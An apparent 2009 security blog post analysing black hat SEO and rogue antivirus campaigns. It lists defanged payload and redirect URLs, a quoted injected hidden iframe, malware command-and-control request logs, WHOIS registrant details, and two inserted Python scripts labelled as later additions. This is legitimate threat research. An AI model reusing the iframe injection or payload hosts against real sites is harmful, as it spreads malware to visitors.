Friday, April 24, 2009

Black Hat SEO and Rogue Antivirus p.9

The silent threat: Black Hat SEO and Rogue Antivirus

Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more

READ THIS page if you need more information

After Trend Micro researchers reported that Easter-related sites were being used
to redirect visitors to rogue antivirus websites, PandaLabs recently uncovered
similar Black Hat SEO attacks against Ford and Ned.org.

By misusing keywords typically associated with global businesses and institutions,
the criminals attract unsuspecting visitors to compromised web sites. These sites
deceive visitors into downloading and installing a fake antivirus product that is
very hard to deactivate or remove. The rogue antivirus shows false alerts to make
users believe that their computer is infected. Scared users are then susceptible
to buying the "antivirus protection" via a page that looks like a secure SSL web
site. In fact, their money and confidential credit card information are stolen by
the criminals the moment they enter their personal details into the payment page.

Many global companies, including Ford, have been exploited in this way. Over a
million compromised web sites used Ford-related keywords to attract visitors to
fake antivirus sites via search engines such as Google (Black hat SEO may force
Google to change algorithm). Other examples of this attack include the misuse of
Easter-related keywords to attract unsuspecting visitors during the Easter season
(Trend Micro Malware Blog - Rotten Eggs: An Easter Malware Campaign).

There are other variants of this type of attack originating from the same
Ukraine/Russia-based criminal fraternity. For example, the criminals use technical
exploits to compromise web sites, blogs, forums and the like. The WordPress blog
management software has been the victim of such an exploit, allowing the criminals
to inject malicious code directly into all pages. A visitor to one of these infected
sites will be redirected to another site where rogue antivirus software is again
downloaded (PandaLabs: New Blackhat SEO attack exploits vulnerabilities in
Wordpress to distribute rogue antivirus software).

The criminals put a lot of effort into assuring the longevity of their scam.
Frequent IP changes and moving from location to location help ensure that
they can continue their activities.

You can get more information about all these attacks from the following
resources. The PandaLabs video gives a particularly clear and concise overview.

The following links provide more information about this attack:

The Tech Herald: Malicious SEO targets Ford Motor Company
PandaLabs: Targeted Blackhat SEO Attack against Ford Motor Co.

Read the article on WebProNews: Blackhat SEO spammers force Google’s hand


Related attack:

PandaLabs: Blackhat SEO Fueled Rogue Security Campaign
Sample hijacked search terms (text file)

The website implicated is: getscanonline.com (also hosted on 209.44.126.14).

Softpedia: Easter and Ford Search Results Poisoned

In this case, the files found on the site are detected by Trend Micro as:

- TROJ_FAKEAV.BAF
- JS_DLOADER.WKQ

The websites in question are trustsecurityshield.com and topsecurity4you.com,
which have each been live for only two or three days (hosted on 209.44.126.14).



Technical details can be found below.


Vulnerabilities in Wordpress exploited to distribute rogue antivirus software

Watch the full video:



Let me draw your attention to the video above.

This is a screenshot at 03:11.

If you zoom into it you will see the domain "load-archive-av-pro.com".
The domain is still active and, as the location of the payload, is shared
with many other fake scanner websites such as "antivir-scan-pro-best.com".
Wepawet Analysis




The process:

I will use some words found on Ned.org as an example.


The Google cache:



The poisoned keywords:

"Kettle Vally Line Song"


The Google search:



The redirection analysis:

hxxp://cropperddi.fortunecity.com/6766.html
hxxp://sandbergjbo.fortunecity.com/26894.html

Analysis -> redirect to a traffic management system
Analysis -> redirect to a traffic management system

hxxp://redirxl.com/filt/in.cgi?5&group=5q

which then redirects to the malicious site

hxxp://antivir-scan-pro-best.com/11038/3/

The payload is located on the same site that appears in the PandaLabs
article, which is:

hxxp://files.load-archive-av-pro.com/normal/setup_11038_3_1.exe


File size: 104971 bytes
MD5...: 2a9889219ec9d0124892e5e64eaed2bd

VirusTotal
Anubis

---------------------------

64.69.32.220

antivir-scan-pro-best.com

Registrant: Lee Brinkman (leebrinkm@gmail.com)
4396 Ross Street
Mount Vernon
Illinois,62864
US
Tel. +001.65746675653

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.antivir-scan-pro-best.com
ns1.antivir-scan-pro-best.com


Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

checker-pc-pro-av.com
sheck-pro-as.com


---------------------------

195.88.80.127 - ECOWEB AS35695 - ecoweb.lv

load-archive-av-pro.com
files.load-archive-av-pro.com

Registrant: Mary Smalls (mary.sma0@gmail.com)
2251 Doctors Drive
Los Angeles
California,90066
US
Tel. +001.86758776498

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.load-archive-av-pro.com
ns1.load-archive-av-pro.com

Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

download-pro-as.net
load-antivir-pro-pc.com
files.load-antivir-pro-pc.com






From the article on PandaLabs' blog about the SEO attack against
Ford Motor Co. you can see the domain "globextubes.com"
previously hosted on 64.69.32.203.

This is a graph (from Robtex) of some of these sites serving in
the same campaign:

fasttube2009.com
globalstube2009.com
globextubes.com
streamingtubes2009.com




This is a file found on one of these sites: softwarefortubeview.40011.exe

VirusTotal Report
Anubis Report



Complete analysis below:

After running, it connects to this URL to receive additional payloads to inject.

nhgfngfdhngf.com - 216.240.148.9

ThreatExpert Report

hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512

hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512

(216.240.148.9)


The page shows these URLs (file info and VirusTotal reports added):

----------------------------------------------------
hxxp://images2009best.com/perce/30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230740e19c810803919c83e9c9f487472375ee/70e/perce.jpg

VirusTotal - 4/40 (10%)
Anubis Report
File size: 94212 bytes
MD5...: e49048a38d0757b92a34dff6fc3b3f74

HTTP Activity:


----------------------------------------------------

hxxp://venerapictures.com/item/6000dc4d413ac4f08dc431fdc85ccde9d80ff0a04b824084feb9c840903939083e0c4f78441277ced/b0b/item.gif

VirusTotal - 7/40 (17.5%)
Anubis Report
File size: 145412 bytes
MD5...: d2b451fee4f7c42b06121cf03f8ea281

----------------------------------------------------
hxxp://venerapictures.com/werber/900/216.jpg

VirusTotal - 8/40 (20%)
Anubis Report
File size: 99332 bytes
MD5...: 5bc8a73f3412c574909e5f3c193fed89

----------------------------------------------------
hxxp://files.get-fails-load-av.com/exe/setup_200002.exe

VirusTotal - 9/40 (22.5%)
Anubis Report
File size: 78347 bytes
MD5...: ff220534519a1a116dbc2dd712bff24a

HTTP Activity:


----------------------------------------------------

hxxp://lwl-softwares.com/939.exe

VirusTotal - 0/39 (0%)
Anubis Report
File size: 180224 bytes
MD5...: 1ff562c02c68f0a8001135dc89b4eaa1

HTTP Activity:



----------------------------------------------------

hxxp://lwl-softwares.com/important.exe

Anubis Report
File size: 135168 bytes
MD5...: 83b4560333601224cb0d5709bdf57191

Trojan.Win32.Tibs

 

Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick move to the IP block 209.44.126.0/24 of "Netelligent Hosting Services Inc", which hosts several fake AV websites as well as exploits that spread the TDSS/Alureon trojan.

All of these have been found following iframes injected on legitimate websites, poisoned keywords in the Google search engine and links on ad networks (screenshot below).


Check it out - maybe someone have access to your PC right now! Protect yourself.

Google also shows 14,800 results for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving for the fake antivirus campaign:

209.44.126.14


209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)



NS for rogue fake av websites

209.44.126.32
asmmnation.com
ThreatExpert report
In conjunction with an IP in Ukraine: Symantec write-up



On the IP 209.44.126.29 we also have a couple of pages with exploits which lead to the TDSS (Alureon) trojan.

I will use this domain as an example: "individualpeople[.]biz"

Malicious script (IFRAME) inserted. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below, which hosts several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

to finally load this page:

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis
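The injected iframe at the start of this chain is zero-sized, so the visitor never sees the redirect. The script below is an added example (not code from the original post) that scans a page for invisible iframes and reports the off-site host each one loads; the sample HTML is constructed and reuses the defanged snippet quoted above.

```python
"""Find invisible iframes of the kind injected into compromised pages.

Added example, not code from the original post. SAMPLE_HTML is constructed;
its first iframe reproduces the injected snippet quoted above (scheme left
defanged as hxxp, so nothing is ever fetched).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_HTML = """<html><body><h1>Legitimate page</h1>
<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
<iframe src="https://www.example.com/embed/video" width="560" height="315"></iframe>
<iframe src="hxxp://example.net/x.html" style="display: none"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _is_zero(value):
    """True for width/height attributes of 0 or 0px."""
    return value is not None and value.strip().lower() in ("0", "0px")


def suspicious_iframes(html, own_hosts=()):
    """Return (src, host) for iframes hidden by size or CSS that load a host
    not listed in own_hosts (the hosts the site legitimately embeds)."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src") or ""
        style = (attrs.get("style") or "").replace(" ", "").lower()
        hidden = (_is_zero(attrs.get("width")) and _is_zero(attrs.get("height"))) \
            or "display:none" in style or "visibility:hidden" in style
        host = urlsplit(src).hostname or ""
        if hidden and host and host not in own_hosts:
            hits.append((src, host))
    return hits
```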

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
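The statsanalist.cn requests above carry base64-encoded parameters that are further obfuscated. As an added example, not code from the original post, the decoder below recovers their plaintext from the two requests (constructed here as log lines). The single-byte XOR key 0x6f is an assumption inferred here: with it, affid and subid decode to the same "11" and "v3072" that appear in the /banner/crcmds/affids/11 and /banner/crcmds/subids/v3072 paths requested from trafficstatic.net, which is what makes the key plausible.

```python
"""Decode the obfuscated query parameters of the statsanalist.cn beacon.

Added example, not code from the original post. SAMPLE_LOG is constructed
from the two requests shown above. XOR_KEY is an assumption: with 0x6f,
affid and subid decode to "11" and "v3072", matching the affids/11 and
subids/v3072 paths requested from trafficstatic.net earlier.
"""
import base64
from urllib.parse import parse_qsl, urlsplit

XOR_KEY = 0x6F  # assumed single-byte key, see the module docstring

# Constructed log lines: the two GET requests to 72.233.114.126 above.
SAMPLE_LOG = [
    "72.233.114.126 GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5",
    "72.233.114.126 GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5",
]

ENCODED_FIELDS = ("gd", "affid", "subid", "prov")  # base64, then XOR


def decode_field(value, key=XOR_KEY):
    """base64-decode, then XOR every byte with key (latin-1 keeps any byte)."""
    raw = base64.b64decode(value)
    return bytes(b ^ key for b in raw).decode("latin-1")


def decode_beacon(log_line, key=XOR_KEY):
    """Return the beacon's parameters with the obfuscated ones decoded."""
    path = log_line.split(" GET ", 1)[1].split(" ", 1)[0]
    params = dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))
    return {k: decode_field(v, key) if k in ENCODED_FIELDS else v
            for k, v in params.items()}


def decode_log(lines, key=XOR_KEY):
    """Decode every beacon line in a log."""
    return [decode_beacon(line, key) for line in lines]


if __name__ == "__main__":
    for record in decode_log(SAMPLE_LOG):
        print(record)
```

The decoded gd field names the beacon's message type, while affid, subid and prov carry the affiliate, sub-affiliate and provider identifiers, which is the same affiliate-style tracking seen in the trafficstatic.net paths.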


IPs implicated:


Other domains related to this campaign can be found using ThreatExpert by searching for the request path

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report